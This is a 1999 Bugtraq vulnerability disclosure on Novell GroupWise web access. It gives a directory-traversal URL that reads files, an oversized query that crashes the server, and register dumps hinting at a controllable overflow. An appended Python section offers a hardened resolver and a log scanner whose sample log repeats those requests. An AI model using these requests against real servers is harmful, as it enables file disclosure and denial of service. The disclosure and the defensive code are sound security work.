[13087] in bugtraq
Re: Groupwise Web Interface
daemon@ATHENA.MIT.EDU (Andrew Frith)
Thu Dec 23 16:48:27 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <003e01bf4cec$ac3301c0$02c8010a@muffhead.bm>
Date: Wed, 22 Dec 1999 22:23:16 -0400
Reply-To: Andrew Frith <afrith@IBL.BM>
From: Andrew Frith <afrith@IBL.BM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Setup:
NT 4, SP4, IIS 4
Netware 4.11, SP7a, GW 5.5 SP2 - Internet Agent & Web access NLM
1. Web server path
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
returns:
Could not find file C:\<web server root>\cgi-bin\GW5\US\HTML3\HELP\BAD-REQUEST.HTM
2. Read files
Using the format
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index I can read any
files that the web service account has read access to & that end in .htm or
.html on the drive, not just in the web areas.
3. DOS?
Sending http://server/cgi-bin/GW5/GWWEB.EXE?<tested with minimum of 512
characters> will cause an abend in GWINTER.NLM (See Break 1 below). The
server appears to function normally. Trying to shut things down
however...... Upon shutting down the Internet agent we then get another
abend, again in GWINTER.NLM (See Break 2 below). The Internet agent will
shut down. The web access will hang, until the server is downed. The NT
box is unaffected by this.
In the first abend GWINTER blows up. Also on the stack is GWENN2.NLM. Not
much there.
In the second abend GWINTER goes boom again. Also on the stack is
GWCMC.NLM. What is a bit more interesting is that EBX = 61616161, or aaaa,
what I was using on the command line. This string is also in the stack
several times.
I have been able to reproduce the above consistently.
***********
Break 1: Server-4.11a: Page Fault Processor Exception (Error code 00000000)
Registers:
CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
EAX = 72006165 EBX = E022BDA8 ECX = 00000004 EDX = 00000001
ESI = E022BDA4 EDI = E022A01C EBP = 00000002 ESP = 0A082F70
EIP = F1B6DD5D FLAGS = 00017297
F1B6DD5D 8A00 MOV AL,[EAX]= ?
EIP in GWINTER.NLM at code start +00000D5Dh
Running process: gwinter 5 Process
Created by: GWINTER.NLM
Stack pointer: A082D60
Stack limit: A063010
Scheduling priority: 0
Wait state: 00
Stack: --0000000A ?
--E022C0D3 ?
--E022BED2 ?
--00000004 ?
--0000024C ?
--E022BECA ?
--E022BD78 ?
--E022BD84 ?
--0A120131 ?
--000001F4 ?
--0A082FE8 ?
--00000000 ?
--E022A02C ?
--E022A01C ?
F1B6D53F (GWINTER.NLM|(Code Start)+53F)
--E022A01C ?
--E022A01C ?
--E0228540 ?
F1B81EF9 ?
--E022A01C ?
F148F0AD (GWENN2.NLM|GW2_NgwThrdCreate+1EE)
--E0228540 ?
--00000000 ?
--E022A01C ?
--00000000 ?
--FB0513E0 ?
--E020E7B0 ?
--0A0F6A60 ?
--FB0513E0 ?
--0A125010 ?
--0A083008 ?
F10BC181 (THREADS.NLM|ScheduleWorkToDo+180)
Additional Information:
The CPU encountered a problem executing code in GWINTER.NLM. The
problem may be in that module or in data passed to that module
by another NLM.
**********
Break 2: Server-4.11a: Page Fault Processor Exception (Error code 00000000)
Registers:
CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
EAX = 00000000 EBX = 61616161 ECX = 00000000 EDX = E0B9B4E0
ESI = 00000001 EDI = 00000096 EBP = 0A123C6C ESP = 0A123C68
EIP = F80BC070 FLAGS = 00017202
F80BC070 8B73FC MOV ESI,[EBX-04]= ?
EIP in SERVER.NLM at code start +000BC070h
Running process: gwinter 0 Process
Created by: GWINTER.NLM
Stack pointer: A123C60
Stack limit: A104010
Scheduling priority: 0
Wait state: 00
Stack: --00000000 ?
--0A123C84 ?
--00000096 ?
--00000001 ?
--61616161 ?
F10B45ED (THREADS.NLM|free+63)
--61616161 ?
--0A123C94 ?
--E022A01C ?
F1B38537 (GWCMC.NLM|cmc_free+11)
--61616161 ?
--0A123FD8 ?
F1B82341 ?
--61616161 ?
--00000008 ?
--00000000 ?
--0A125350 ?
--0000890B (DS.NLM|DSF9085F20+55D8)
F1B83C52 ?
--0BB01F80 (FPSM.NLM|_fltused_+B01A)
--00007286 (DS.NLM|DSF9085F20+3F53)
--F915D970 ?
--F915DAA0 ?
--00000000 ?
--0A123CF8 ?
--0A123CF0 ?
--0A0F6460 ?
--00000001 ?
--00000004 ?
F80BC193 ?
--00000004 ?
--002E12E0 ?
Additional Information:
The CPU encountered a problem executing code in SERVER.NLM. The
problem may be in that module or in data passed to that module
by a process owned by GWINTER.NLM.
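The two web-facing problems described in the post (a HELP= value joined straight onto the help directory so that "../" walks out of it, and an oversized query string that abends GWINTER.NLM) are both things a front-end or log review can catch. Below is an added example, written for this page and not code from Novell or from the original poster, showing a hardened topic-to-file resolver beside a small scanner for W3C-style web-server log lines. The help root, the 256-character query limit, the topic character set and every log line are constructed assumptions; the request shapes are the ones quoted in the post.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed install location (the post gives it as
# C:\<web server root>\cgi-bin\GW5\US\HTML3\HELP); posix form is used here
# so the containment check below works on any platform.
HELP_ROOT = "/inetpub/wwwroot/cgi-bin/GW5/US/HTML3/HELP"

# Assumed limit: the post reports an abend with 512 or more query characters,
# so anything approaching that is rejected before it reaches the CGI.
MAX_QUERY_LEN = 256

# Help topics are plain names such as "about" or "bad-request"; anything with
# a dot, slash or backslash is refused outright.
TOPIC_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_help_topic(topic):
    """Map a HELP= value to a file under HELP_ROOT, or return None if unsafe.

    Hardened counterpart of the behaviour described in the post, where the
    raw value was appended to the help directory and could name any .htm
    file on the drive. Two independent checks: a strict allow-list on the
    topic name, then a containment test on the normalised path.
    """
    if not TOPIC_RE.fullmatch(topic):
        return None
    candidate = posixpath.normpath(
        posixpath.join(HELP_ROOT, topic.upper() + ".HTM"))
    # Defence in depth: even if the regex were loosened later, the resolved
    # path must still sit inside the help directory.
    if posixpath.commonpath([HELP_ROOT, candidate]) != HELP_ROOT:
        return None
    return candidate


def classify_request(url):
    """Return a list of findings for one request to GWWEB.EXE.

    Non-GWWEB URLs yield an empty list. Findings are 'oversized-query' for a
    query string at or above MAX_QUERY_LEN and 'help-traversal-or-invalid'
    for a HELP= value the hardened resolver refuses.
    """
    parts = urlsplit(url)
    findings = []
    if not parts.path.lower().endswith("/gwweb.exe"):
        return findings
    if len(parts.query) >= MAX_QUERY_LEN:
        findings.append("oversized-query")
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in params.items():
        if key.upper() != "HELP":
            continue
        for value in values:
            if resolve_help_topic(value) is None:
                findings.append("help-traversal-or-invalid")
    return findings


def scan_log(text):
    """Scan W3C-style lines (date time c-ip method uri-stem uri-query status)
    and return [(line_number, findings)] for lines that need a look."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        fields = line.split()
        if len(fields) < 7 or fields[3] != "GET":
            continue
        stem, query = fields[4], fields[5]
        if query == "-":          # W3C convention for an empty field
            query = ""
        findings = classify_request("http://server" + stem + "?" + query)
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample log: a normal help request, the traversal request from
# the post, a 512-character junk query like the one that abended GWINTER.NLM,
# and a traversal attempt against a different CGI that this scanner ignores.
SAMPLE_LOG = "\n".join([
    "1999-12-22 22:23:16 10.1.200.2 GET /cgi-bin/GW5/GWWEB.EXE HELP=about 200",
    "1999-12-22 22:23:40 10.1.200.2 GET /cgi-bin/GW5/GWWEB.EXE HELP=../../../../../index 200",
    "1999-12-22 22:24:05 10.1.200.2 GET /cgi-bin/GW5/GWWEB.EXE " + "a" * 512 + " 500",
    "1999-12-22 22:24:30 10.1.200.2 GET /cgi-bin/GW5/other.exe HELP=../x 200",
])

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

The resolver deliberately refuses rather than sanitises: stripping "../" sequences from input is the classic mistake, since an encoded or doubled sequence survives the filter, whereas an allow-list on the topic name leaves nothing to bypass. The log scanner is the same logic turned around, so a single definition of "acceptable HELP value" serves both the fix and the detection.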